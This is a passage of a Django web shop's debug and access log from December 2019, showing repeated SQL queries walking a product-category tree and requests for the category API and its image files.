"shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 07:12:56] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-27 07:13:06,010 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 07:13:06,016 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 07:13:06,020 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 07:13:06,022 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 07:13:06,025 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 07:13:06,027 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 07:13:06,030 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 07:13:06,032 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 07:13:06,034 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 07:13:06,037 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 07:13:06,040 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 07:13:06,042 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 07:13:06,044 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 07:13:06,046 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 07:13:06,050 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 07:13:06,052 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 07:13:06,054 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 07:13:06,058 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 07:13:06,061 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 07:13:06,064 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 07:13:06,066 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 07:13:06,069 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 07:13:06,071 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 07:13:06,073 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 07:13:06,075 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 07:13:06,079 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 07:13:06,082 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 07:13:06,085 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 07:13:06,089 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 07:13:06,092 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 07:13:06,097 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 07:13:06,100 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 07:13:06,103 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 07:13:06,106 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 07:13:06,110 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 07:13:06,115 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 07:13:06,118 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 07:13:06,122 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 07:13:06,125 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 07:13:06,128 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 07:13:06,132 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 07:13:06,136 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 07:13:06,141 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 07:13:06,146 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 07:13:06,149 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 07:13:06,152 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 07:13:06] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [27/Dec/2019 07:13:07] "GET /media/categories/2019/12/13/collection3_lEyiVWB.png HTTP/1.0" 200 784410 [27/Dec/2019 07:13:07] "GET /media/categories/2019/12/13/collection3_rYale9k.png HTTP/1.0" 200 784410 [27/Dec/2019 07:13:07] "GET /media/categories/2019/12/13/collection3_O3U2Kj1.png HTTP/1.0" 200 784410 [27/Dec/2019 07:13:07] "GET /media/categories/2019/12/13/collection3_blWHbYx.png HTTP/1.0" 200 784410 [27/Dec/2019 07:13:07] "GET /media/categories/2019/12/13/collection4.png HTTP/1.0" 200 432480 [27/Dec/2019 07:13:07] "GET /media/categories/2019/12/13/collection3_pKohXg6.png HTTP/1.0" 200 784410 [27/Dec/2019 07:13:10] "GET /media/categories/2019/12/13/popular3.png HTTP/1.0" 200 309908 [27/Dec/2019 07:13:10] "GET /media/categories/2019/12/13/collection3_3c60jfJ.png HTTP/1.0" 200 784410 [27/Dec/2019 07:13:11] "GET /media/categories/2019/12/13/collection7_sU2pbFG.png HTTP/1.0" 200 379075 [27/Dec/2019 07:13:11] "GET /media/categories/2019/12/13/collection7_s1gVgUK.png HTTP/1.0" 200 379075 [27/Dec/2019 07:13:11] "GET /media/categories/2019/12/13/collection7_zgKzb94.png HTTP/1.0" 200 379075 [27/Dec/2019 07:13:11] "GET /media/categories/2019/12/13/collection7_ZCM4YHI.png HTTP/1.0" 200 379075 [27/Dec/2019 07:13:12] "GET /media/categories/2019/12/13/collection4_ykrPiOh.png HTTP/1.0" 200 432480 [27/Dec/2019 07:13:13] "GET /media/categories/2019/12/13/collection4_wmrC3xY.png HTTP/1.0" 200 432480 [27/Dec/2019 07:13:13] "GET /media/categories/2019/12/13/collection4_45IbUzs.png HTTP/1.0" 200 432480 [27/Dec/2019 07:13:13] "GET /media/categories/2019/12/13/collection4_klUHkrJ.png HTTP/1.0" 200 432480 [27/Dec/2019 07:13:13] "GET /media/categories/2019/12/13/collection7.png HTTP/1.0" 200 379075 [27/Dec/2019 07:13:14] "GET /media/categories/2019/12/13/weapons2.png HTTP/1.0" 200 523712 [27/Dec/2019 07:13:14] "GET /media/categories/2019/12/13/collection8_98NdtQd.png HTTP/1.0" 200 376652 [27/Dec/2019 07:13:15] "GET /media/categories/2019/12/13/collection8.png HTTP/1.0" 200 376652 [27/Dec/2019 07:13:15] "GET /media/categories/2019/12/13/collection5_VsJvXmq.png HTTP/1.0" 200 454674 [27/Dec/2019 07:13:15] "GET /media/categories/2019/12/13/weapons1.png HTTP/1.0" 200 700594 [27/Dec/2019 07:13:16] "GET /media/categories/2019/12/13/collection8_qT6o4Ze.png HTTP/1.0" 200 376652 [27/Dec/2019 07:13:17] "GET /media/categories/2019/12/13/collection5_J2Tl3z7.png HTTP/1.0" 200 454674 [27/Dec/2019 07:13:17] "GET /media/categories/2019/12/13/collection8_MKX5n4Y.png HTTP/1.0" 200 376652 [27/Dec/2019 07:13:17] "GET /media/categories/2019/12/13/collection5_NjJaGxE.png HTTP/1.0" 200 454674 [27/Dec/2019 07:13:17] "GET /media/categories/2019/12/13/collection5.png HTTP/1.0" 200 454674 [27/Dec/2019 07:13:18] "GET /media/categories/2019/12/13/collection5_DOY3fSw.png HTTP/1.0" 200 454674 [27/Dec/2019 07:13:18] "GET /media/categories/2019/12/13/collection9.png HTTP/1.0" 200 284188 [27/Dec/2019 07:13:18] "GET /media/categories/2019/12/13/collection9_y5Aperx.png HTTP/1.0" 200 284188 [27/Dec/2019 07:15:07] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-27 07:15:37,293 utils 4252 140031503103744 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 07:15:37,303 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 07:15:37,311 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 07:15:37,315 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 07:15:37,321 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 07:15:37,324 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 07:15:37,328 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 07:15:37,332 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 07:15:37,337 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 07:15:37,343 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 07:15:37,347 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 07:15:37,351 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 07:15:37,355 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 07:15:37,359 